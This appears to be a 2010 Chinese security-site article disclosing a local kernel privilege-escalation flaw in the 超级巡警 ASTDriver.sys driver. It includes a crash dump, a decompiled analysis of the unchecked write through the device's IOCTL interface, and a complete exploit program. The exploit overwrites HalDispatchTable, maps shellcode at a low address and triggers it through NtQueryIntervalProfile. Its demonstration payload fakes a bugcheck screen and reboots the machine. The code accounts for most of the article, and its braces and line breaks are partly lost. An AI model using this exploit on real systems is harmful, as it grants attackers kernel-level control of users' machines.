首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
超级巡警 <= v4 Build0316 ASTDriver.sys 本地特权提升漏洞
来源:vfocus.net 作者:vfocus 发布时间:2010-07-16  

该漏洞是我2010年4月6日晚上,通过自己的IoControl Fuzz工具挖掘的。漏洞存在于超级巡警ASTDriver.sys这个驱动中,影响超级巡警v4 Build0316和以前的版本。利用该漏洞能够实现本地特权提升,进Ring0。

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 89441428, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: f9c7569b, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 00000000, (reserved)
PROCESS_NAME: ast.exe
TRAP_FRAME: f94f1b00 -- (.trap 0xfffffffff94f1b00)
ErrCode = 00000002
eax=89441428 ebx=81266840 ecx=89441428 edx=ffa7c2d8 esi=81312da0 edi=811fc230
eip=f9c7569b esp=f94f1b74 ebp=f94f1b90 iopl=0 nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296
ASTDriver+0x169b:
f9c7569b c70000000000 mov dword ptr [eax],0 ds:0023:89441428=????????
Resetting default scope
STACK_TEXT:
f94f1634 804f9afd 00000003 89441428 00000000 nt!RtlpBreakWithStatusInstruction
f94f1680 804fa6e8 00000003 00000000 c044a208 nt!KiBugCheckDebugBreak+0x19
f94f1a60 804fac37 00000050 89441428 00000001 nt!KeBugCheck2+0x574
f94f1a80 80520478 00000050 89441428 00000001 nt!KeBugCheckEx+0x1b
f94f1ae8 80544568 00000001 89441428 00000000 nt!MmAccessFault+0x9a8
f94f1ae8 f9c7569b 00000001 89441428 00000000 nt!KiTrap0E+0xd0
WARNING: Stack unwind information not available. Following frames may be wrong.
f94f1b90 f9c75184 89441428 5fea3278 50000408 ASTDriver+0x169b
f94f1bc4 804efeb1 81286f18 81266840 806e5410 ASTDriver+0x1184
f94f1bd4 8057f688 812668b0 8125fbe8 81266840 nt!IopfCallDriver+0x31
f94f1be8 805804eb 81286f18 81266840 8125fbe8 nt!IopSynchronousServiceTail+0x60
f94f1c84 8057904e 00000928 00000000 00000000 nt!IopXxxControlFile+0x5c5
f94f1cb8 f74ecb12 00000928 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f94f1d34 8054160c 00000928 00000000 00000000 BehaviorMon!HookNtDeviceIoControlFile+0x892
//省略……
从上面分析中的栈回溯可以看出,问题发生在ASTDriver+0x169b所在的函数中,这个函数是从ASTDriver+0x1184所在的函数调用过来的。因此我们先定位到ASTDriver+0x1184所在的函数,如下所示:
signed int __stdcall sub_110D0(int a1, PIRP Irp)
{
signed int result; // eax@2
int pIrpStack; // [sp+8h] [bp-1Ch]@1
int v4; // [sp+Ch] [bp-18h]@10
int secondDWORD; // [sp+10h] [bp-14h]@3
PVOID systemBuffer; // [sp+18h] [bp-Ch]@1
int firstDWORD; // [sp+1Ch] [bp-8h]@3
int IoControlCode; // [sp+20h] [bp-4h]@3
pIrpStack = (int)Irp->Tail.Overlay.CurrentStackLocation;
systemBuffer = Irp->AssociatedIrp.MasterIrp;
if ( *(_DWORD *)(pIrpStack + 8) == 16 )
{
secondDWORD = *((_DWORD *)systemBuffer + 1);
firstDWORD = *(_DWORD *)systemBuffer;
IoControlCode = *(_DWORD *)(pIrpStack + 12);
switch ( IoControlCode )
{
case 0x50000404:
v4 = sub_112B0(firstDWORD, secondDWORD, *((PVOID *)systemBuffer + 2), *((_DWORD *)systemBuffer + 3));
break;
case 0x50000408:
v4 = sub_11690((PVOID)firstDWORD, secondDWORD);
break;
case 0x5000040C:
v4 = sub_11810((PVOID)firstDWORD, secondDWORD);
break;
}
IofCompleteRequest(Irp, 0);
result = v4;
}
else
{
IofCompleteRequest(Irp, 0);
result = 0xC000000Du;
}
return result;
}
该函数实际上就是驱动的派遣函数。当IoControlCode为0x50000408时,会调用sub_11690函数,参数有两个,第一个参数是用户输入缓冲区中的第一个DWORD,第二个参数是用户输入缓冲区的第二个DWORD。从Windbg输出的被随机化的用户输入数据可以看到,这两个 DWORD分别是0x89441428和0x5fea3278,这一点和栈回溯的结果是一致的。
f94f1b90 f9c75184 89441428 5fea3278 50000408 ASTDriver+0x169b
接下来,我们需要分析一下sub_11690函数的内部逻辑,
signed int __stdcall sub_11690(PVOID firstDWORD, int secondDWORD)
{
signed int result; // eax@2
unsigned int v3; // [sp+0h] [bp-1Ch]@6
int v4; // [sp+4h] [bp-18h]@6
int v5; // [sp+14h] [bp-8h]@6
PVOID v6; // [sp+18h] [bp-4h]@15
*(_DWORD *)firstDWORD = 0;
if ( secondDWORD == 32 )
{
if ( MmIsAddressValid(firstDWORD) && MmIsAddressValid(firstDWORD + secondDWORD - 1) )
{
//省略部分代码……
}
}
return result;
}
这个函数有一个致命的错误,函数开头没有对firstDWORD进行任何检查,直接向firstDWORD地址所指向的DWORD赋值为0,而 firstDWORD是我们可以控制的。
至此,该漏洞已经分析完毕。漏洞利用起来也非常简单,只要将要修改的Ring0内存地址放在输入缓冲区的第一个DWORD即可。然后向设备\device \ASTDrivers发送IoControlCode为0x50000408的IoControl。这样便实现了向任意地址写0的作用。
另外,如果进一步研究上面sub_11690函数的内部逻辑,如果不利用“*(_DWORD *)firstDWORD = 0;”这句代码的漏洞,函数中还有其他几处漏洞可以利用,最终实现向任意地址写入任意数据的效果。
测试方法
 

  1. #include "ASTDrivers_Exp.h" 
  2. #include "InvbShellCode.h" 
  3.  
  4. #define BUFFER_LENGTH 0x04 
  5. #define IOCTL_METHOD_NEITHER 0x5000040c 
  6.  
  7.  
  8. VOID InbvShellCode() 
  9. __asm 
  10. // 
  11. // KeDisableInterrupts 
  12. // 
  13. pushf 
  14. pop eax 
  15. and eax, 0x0200 
  16. shr eax, 0x09 
  17. cli 
  18.  
  19. // 
  20. // Prepareing Screen 
  21. // 
  22. call InbvAcquireDisplayOwnership 
  23.  
  24. call InbvResetDisplay 
  25.  
  26. sub esi, esi 
  27. push 0x04 
  28. mov edi, 0x01DF 
  29. push edi 
  30. mov ebx, 0x027F 
  31. push ebx 
  32. push esi 
  33. push esi 
  34. call InbvSolidColorFill 
  35.  
  36. push 0x0F 
  37. call InbvSetTextColor 
  38.  
  39. push esi 
  40. call InbvInstallDisplayStringFilter 
  41.  
  42. inc esi 
  43. push esi 
  44. call InbvEnableDisplayString 
  45.  
  46. dec edi 
  47. dec edi 
  48. push edi 
  49. push ebx 
  50. dec esi 
  51. push esi 
  52. push esi 
  53. call InbvSetScrollRegion 
  54.  
  55. lea eax, BugCheckString 
  56. push eax 
  57. call InbvDisplayString 
  58.  
  59. mov esi, 0x80000000 
  60. mov ecx, esi 
  61.  
  62. // 
  63. // Countdown 
  64. // 
  65. __loop01: 
  66. dec ecx 
  67. jnz __loop01 
  68.  
  69. lea eax, BugCheck01 
  70. push eax 
  71. call InbvDisplayString 
  72.  
  73. mov ecx, esi 
  74.  
  75. __loop02: 
  76. dec ecx 
  77. jnz __loop02 
  78.  
  79. lea eax, BugCheck02 
  80. push eax 
  81. call InbvDisplayString 
  82.  
  83. mov ecx, esi 
  84.  
  85. __loop03: 
  86. dec ecx 
  87. jnz __loop03 
  88.  
  89. lea eax, BugCheck03 
  90. push eax 
  91. call InbvDisplayString 
  92.  
  93. mov ecx, esi 
  94.  
  95. __loop04: 
  96. dec ecx 
  97. jnz __loop04 
  98.  
  99. lea eax, BugCheck04 
  100. push eax 
  101. call InbvDisplayString 
  102.  
  103. mov ecx, esi 
  104. shl ecx, 0x01 
  105.  
  106. __loop05: 
  107. dec ecx 
  108. jnz __loop05 
  109.  
  110. // 
  111. // Reseting Processor 
  112. // 
  113. mov al, 0xFE 
  114. out 0x64, al 
  115.  
  116.  
  117. PVOID RtlAllocateMemory( 
  118. IN ULONG Length) 
  119. NTSTATUS NtStatus; 
  120.  
  121. PVOID BaseAddress = NULL; 
  122.  
  123.  
  124. NtStatus = NtAllocateVirtualMemory( 
  125. NtCurrentProcess(), 
  126. &BaseAddress, 
  127. 0, 
  128. &Length, 
  129. MEM_RESERVE | 
  130. MEM_COMMIT, 
  131. PAGE_READWRITE); 
  132.  
  133. if(NtStatus == STATUS_SUCCESS) 
  134. RtlZeroMemory(BaseAddress, Length); 
  135.  
  136. return BaseAddress; 
  137.  
  138. return NULL; 
  139.  
  140. VOID RtlFreeMemory( 
  141. IN PVOID BaseAddress) 
  142. NTSTATUS NtStatus; 
  143.  
  144. ULONG FreeSize = 0; 
  145.  
  146.  
  147. NtStatus = NtFreeVirtualMemory( 
  148. NtCurrentProcess(), 
  149. &BaseAddress, 
  150. &FreeSize, 
  151. MEM_RELEASE); 
  152. char g_ressdtDataForAst[32]={0}; 
  153. char g_ressdtInputBuffer[16]={0};//输入的缓冲区 
  154.  
  155.  
  156. int __cdecl main(int argc, char **argv) 
  157. NTSTATUS NtStatus; 
  158.  
  159. HANDLE DeviceHandle; 
  160. ULONG ReturnLength = 0; 
  161.  
  162. ULONG ImageBase; 
  163. PVOID MappedBase; 
  164. UCHAR ImageName[KERNEL_NAME_LENGTH]; 
  165. ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES; 
  166. PVOID HalDispatchTable; 
  167. PVOID xHalQuerySystemInformation; 
  168. PVOID MmUserProbeAddress; 
  169.  
  170. ULONG ShellCodeSize = PAGE_SIZE; 
  171. PVOID ShellCodeAddress; 
  172. PVOID BaseAddress = NULL; 
  173.  
  174. UNICODE_STRING DeviceName; 
  175. UNICODE_STRING DllName; 
  176. ANSI_STRING ProcedureName; 
  177. OBJECT_ATTRIBUTES ObjectAttributes; 
  178. IO_STATUS_BLOCK IoStatusBlock; 
  179. SYSTEM_MODULE_INFORMATION_EX *ModuleInformation = NULL; 
  180. LARGE_INTEGER Interval; 
  181.  
  182. ULONG TextColor; 
  183.  
  184. /////////////////////////////////////////////////////////////////////////////////////////////// 
  185.  
  186. system("cls"); 
  187.  
  188. NtStatus = NtQuerySystemInformation( 
  189. SystemModuleInformation, 
  190. ModuleInformation, 
  191. ReturnLength, 
  192. &ReturnLength); 
  193.  
  194. if(NtStatus == STATUS_INFO_LENGTH_MISMATCH) 
  195. ReturnLength = (ReturnLength & 0xFFFFF000) + PAGE_SIZE * sizeof(ULONG); 
  196.  
  197. ModuleInformation = RtlAllocateMemory(ReturnLength); 
  198.  
  199. if(ModuleInformation) 
  200. NtStatus = NtQuerySystemInformation( 
  201. SystemModuleInformation, 
  202. ModuleInformation, 
  203. ReturnLength, 
  204. NULL); 
  205.  
  206. if(NtStatus == STATUS_SUCCESS) 
  207. ImageBase = (ULONG)(ModuleInformation->Modules[0].Base); 
  208.  
  209. RtlMoveMemory( 
  210. ImageName, 
  211. (PVOID)(ModuleInformation->Modules[0].ImageName + 
  212. ModuleInformation->Modules[0].ModuleNameOffset), 
  213. KERNEL_NAME_LENGTH); 
  214.  
  215. printf(" +----------------------------------------------------------------------------+\n" 
  216. " | ImageBase - 0x%.8X |\n" 
  217. " | ImageName - %s |\n"
  218. ImageBase, 
  219. ImageName); 
  220.  
  221.  
  222. RtlFreeMemory(ModuleInformation); 
  223.  
  224.  
  225. RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName); 
  226.  
  227.  
  228. NtStatus = LdrLoadDll( 
  229. NULL, // DllPath 
  230. &DllCharacteristics, // DllCharacteristics 
  231. &DllName, // DllName 
  232. &MappedBase); // DllHandle 
  233.  
  234. if(NtStatus) 
  235. printf(" [*] NtStatus of LdrLoadDll - %.8X\n", NtStatus); 
  236. return NtStatus; 
  237.  
  238. RtlInitAnsiString(&ProcedureName, "HalDispatchTable"); 
  239.  
  240.  
  241. NtStatus = LdrGetProcedureAddress( 
  242. (PVOID)MappedBase, // DllHandle 
  243. &ProcedureName, // ProcedureName 
  244. 0, // ProcedureNumber OPTIONAL 
  245. (PVOID*)&HalDispatchTable); // ProcedureAddress 
  246.  
  247. if(NtStatus) 
  248. printf(" [*] NtStatus of LdrGetProcedureAddress - %.8X\n", NtStatus); 
  249. return NtStatus; 
  250.  
  251. (ULONG)HalDispatchTable -= (ULONG)MappedBase; 
  252. (ULONG)HalDispatchTable += ImageBase; 
  253.  
  254. (ULONG)xHalQuerySystemInformation = (ULONG)HalDispatchTable + sizeof(ULONG); 
  255.  
  256. printf(" | |\n" 
  257. " | HalDispatchTable - 0x%.8X |\n" 
  258. " | xHalQuerySystemInformation - 0x%.8X |\n" 
  259. " +----------------------------------------------------------------------------+\n"
  260. HalDispatchTable, 
  261. xHalQuerySystemInformation); 
  262.  
  263.  
  264. NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase); 
  265.  
  266. if(NtStatus) 
  267. printf(" [*] NtStatus of XxInitInbv - %.8X\n", NtStatus); 
  268. return NtStatus; 
  269.  
  270. LdrUnloadDll((PVOID)MappedBase); 
  271.  
  272.  
  273. RtlInitUnicodeString(&DeviceName, L"\\Device\\ASTDrivers"); 
  274.  
  275. ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES); 
  276. ObjectAttributes.RootDirectory = 0; 
  277. ObjectAttributes.ObjectName = &DeviceName; 
  278. ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE; 
  279. ObjectAttributes.SecurityDescriptor = NULL; 
  280. ObjectAttributes.SecurityQualityOfService = NULL; 
  281.  
  282. NtStatus = NtCreateFile( 
  283. &DeviceHandle, // FileHandle 
  284. FILE_READ_DATA | 
  285. FILE_WRITE_DATA, // DesiredAccess 
  286. &ObjectAttributes, // ObjectAttributes 
  287. &IoStatusBlock, // IoStatusBlock 
  288. NULL, // AllocationSize OPTIONAL 
  289. 0, // FileAttributes 
  290. FILE_SHARE_READ | 
  291. FILE_SHARE_WRITE, // ShareAccess 
  292. FILE_OPEN_IF, // CreateDisposition 
  293. 0, // CreateOptions 
  294. NULL, // EaBuffer OPTIONAL 
  295. 0); // EaLength 
  296.  
  297. if(NtStatus) 
  298. printf(" [*] NtStatus of NtCreateFile - %.8X\n", NtStatus); 
  299. return NtStatus; 
  300.  
  301.  
  302. memset(g_ressdtDataForAst,0,32); 
  303. memset(g_ressdtInputBuffer,0,16); 
  304. *(DWORD *)g_ressdtDataForAst=2; 
  305. *(DWORD *)((ULONG)g_ressdtDataForAst+4)=0xFF; 
  306. *(DWORD *)((ULONG)g_ressdtDataForAst+8)=(DWORD)xHalQuerySystemInformation; 
  307. *(DWORD *)((ULONG)g_ressdtDataForAst+12)=2; 
  308. *(ULONG *)((ULONG)g_ressdtDataForAst+16)=4; 
  309. *(ULONG *)((ULONG)g_ressdtDataForAst+20)=0x90; 
  310. *(ULONG *)((ULONG)g_ressdtDataForAst+24)=0x90; 
  311. *(ULONG *)((ULONG)g_ressdtDataForAst+28)=0x90; 
  312.  
  313. //设置缓冲区中的指针 使其指向真实的结构体 
  314. *(DWORD *)g_ressdtInputBuffer=(DWORD)g_ressdtDataForAst; 
  315.  
  316.  
  317. NtStatus = NtDeviceIoControlFile( 
  318. DeviceHandle, // FileHandle 
  319. NULL, // Event 
  320. NULL, // ApcRoutine 
  321. NULL, // ApcContext 
  322. &IoStatusBlock, // IoStatusBlock 
  323. IOCTL_METHOD_NEITHER, // IoControlCode 
  324. g_ressdtInputBuffer, // InputBuffer 
  325. 16, // InputBufferLength 
  326. 0, // OutputBuffer 
  327. 0); // OutBufferLength 
  328.  
  329. if(NtStatus) 
  330. printf(" [*] NtStatus of NtDeviceIoControlFile [1] - %.8X\n", NtStatus); 
  331. //return NtStatus; 
  332.  
  333.  
  334. ShellCodeAddress = (PVOID)sizeof(ULONG); 
  335.  
  336. NtStatus = NtAllocateVirtualMemory( 
  337. NtCurrentProcess(), // ProcessHandle 
  338. &ShellCodeAddress, // BaseAddress 
  339. 0, // ZeroBits 
  340. &ShellCodeSize, // AllocationSize 
  341. MEM_RESERVE | 
  342. MEM_COMMIT | 
  343. MEM_TOP_DOWN, // AllocationType 
  344. PAGE_EXECUTE_READWRITE); // Protect 
  345.  
  346. if(NtStatus) 
  347. printf(" [*] NtStatus of NtAllocateVirtualMemory - %.8X\n", NtStatus); 
  348. return NtStatus; 
  349.  
  350. RtlMoveMemory( 
  351. ShellCodeAddress, 
  352. (PVOID)InbvShellCode, 
  353. ShellCodeSize); 
  354.  
  355. Interval.LowPart = 0xFF676980; 
  356. Interval.HighPart = 0xFFFFFFFF; 
  357.  
  358. printf("\n 3"); 
  359. NtDelayExecution(FALSE, &Interval); 
  360.  
  361. printf(" 2"); 
  362. NtDelayExecution(FALSE, &Interval); 
  363.  
  364. printf(" 1"); 
  365. NtDelayExecution(FALSE, &Interval); 
  366.  
  367. printf(" Hoop\n\n"); 
  368. NtDelayExecution(FALSE, &Interval); 
  369.  
  370.  
  371. NtStatus = NtQueryIntervalProfile( 
  372. ProfileTotalIssues, // Source 
  373. NULL); // Interval 
  374.  
  375. if(NtStatus) 
  376. printf(" [*] NtStatus of NtQueryIntervalProfile - %.8X\n", NtStatus); 
  377. return NtStatus; 
  378.  
  379.  
  380. NtStatus = NtClose(DeviceHandle); 
  381.  
  382. if(NtStatus) 
  383. printf(" [*] NtStatus of NtClose - %.8X\n", NtStatus); 
  384. return NtStatus; 
  385.  
  386. return FALSE; 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·v5shop 网上商城系统通杀oday
·PHPCMS2008 sp3、sp4 SQL注入漏
·天缘学校网站系统 v1.3 上传漏洞
·Struts2/XWork 安全漏洞及解决办
·百度贴吧吧主密码窃取漏洞
·114啦网址导航建站系统跨站漏洞
·PHP代码执行漏洞-总结
·MyPHP Forum SQL注入漏洞
·HDWiki百科程序后台Getshell漏洞
·中嘉华诚内核加固免疫系统单机版
·Struts2和Webwork远程命令执行漏
·最新 phpcms 0day(图)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved